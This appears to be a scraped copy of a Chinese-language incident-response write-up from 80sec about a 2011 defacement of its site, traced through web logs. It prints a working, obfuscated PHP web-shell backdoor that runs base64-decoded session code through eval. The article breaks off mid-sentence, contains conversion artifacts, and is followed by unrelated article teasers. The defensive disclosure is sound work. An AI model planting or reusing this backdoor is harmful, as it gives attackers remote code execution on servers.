email: jianxin#80sec.com
site:
date: 2011-11-30
from: /
[ 目錄 ]
0×00 事件背景
0×01 應急響應
0×02 事件分析
0×03 事件啟示
0×04 總結
0×00 事件背景
在感恩節的晚上,我們的站點遭遇了攻擊,幾名未知性別的黑客成功塗改掉了我們的首頁,事情發生後很多朋友對我們被攻擊的原因和經過都很關心,各種猜測都有,加上我們後續對於這次攻擊的分析結果來看,我們覺得整次攻擊和事後應急及分析的過程都適合作為一次典型的案例分析,把整件事情披露出來無論是對我們還是對業界會非常有意義,入侵者給我們在感恩節送了這麼好的禮物,我們要好好接受才對:)
0×01 應急響應
事件發生之後的一段時間我們登入到伺服器,由於首頁替換的時間很短暫,我們甚至沒有抓到截圖,開始甚至都懷疑是arp欺騙或者是dns劫持之類的攻擊,但是作為應急響應的箴言之一,我們最好不要相信猜測,一切以日誌分析為主,一旦猜測我們從開始就輸了。
我們知道在webserver的日誌裡記錄了幾乎所有有價值的資訊,我們後續的檢測必須依賴於日誌,所以建議各位日誌沒開的同學先把日誌開啟並且儲存足夠長的時間,在這個有價值的資訊裡,我們第乙個需要找準的就是攻擊發生的具體時間點,因為我們是首頁被黑並且時間較短,我們迅速stat了下首頁檔案的內容,發現完全正常沒有任何改變:
我們知道在linux系統下面的ctime會需要許可權較高才能修改,而我們的系統是最新的patch,據我們了解也應該不存在使用未公開的漏洞來攻擊我們的可能,畢竟我們只是乙個技術站點,難道真的是arp或者是dns劫持麼?在webserver的log裡有乙個選項記錄了這一次請求所傳遞的資料量,我們對比了下發現,的確在某個時間首頁的資料量有乙個顯著的減少:
為676位元組,而一般的請求大小為
31831位元組,我們可以確認webserver的確出現了問題,入侵者的確能夠控制我們的首頁顯示,到這裡我們基本可以確定攻擊時間和攻擊的源ip了,當你被黑了的時候,第乙個訪問那個頁面的基本就是攻擊者本人,他們會迫不及待的來看攻擊成果:)
既然伺服器有問題了,那我們來看看今天有什麼檔案被修改了:
find /home/ -ctime 1
立刻我們就發現了一些好玩的東西:
<?php
session_start();
$_post['code'] && $_session['thecode'] = trim($_post['code']);
$_session['thecode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_session[\'thecode\']))','a');
看來這就是那只後門了,寫到了乙個全域性可寫的快取檔案裡,而且特意做了隱藏,基本是正常的**也不觸發什麼關鍵字,那麼問題在於這麼一些可愛的**是怎麼到我的伺服器上的呢?這個後門我們發現最早出現的時間並不是在80sec裡,而是在同一伺服器上乙個80sec童鞋的blog裡,最早的時間可以追朔到
ip似乎也比較吻合,那麼似乎假設如果沒有猜錯的話,第乙個被攻擊的目標應該是這個很勺的80sec童鞋的blog才對,那麼是如何攻擊的呢?我們將日誌裡與這個ip相關的抽取出來
攻擊很早就發生了,甚至還使用了
感恩節的遐想
沒有過洋節日的習慣。除了戀愛期間陪女友過過聖誕節情人節之外,記憶中似乎已經沒有什麼洋節日的殘留。然而感恩節是所有洋節日中我最為鍾情的乙個節日。感恩是一種美德更是一種偉大的力量,它能使我們更成熟 更堅強 更崇高。在這個節日裡,我首先想到的是我的母親。感謝母親給了我生命,養育我 雖然母親一字不識卻交給了...
寫在2023年的感恩節
今天,參加了tecent的智慧型硬體部門的嵌入式軟體工程師一職的面試。感覺一般,你也試試?預熱1,自我介紹 2,映象最深的專案,從中學到了什麼。正題 1,程序間通訊的方式 2,申請記憶體的幾種方式,有什麼區別。怎樣釋放記憶體以獲取連續記憶體。vmalloc和kmalloc能夠申請的最大值。3,描述中...
Emotet銀行木馬傳播特製感恩節「祝福」
幾乎無處不在的銀行木馬emotet沉寂一段時間之後再度活躍,此次活躍與感恩節主題活動有關。forcepoint的研究人員發現,emotet通過新的策略和模組公升級了功能,增強了殺傷力。emotet背後的犯罪分子利用全民準備歡度感恩節的時機,每天傳送約27,000個郵件,郵件內容的措辭與以往欺騙金融界...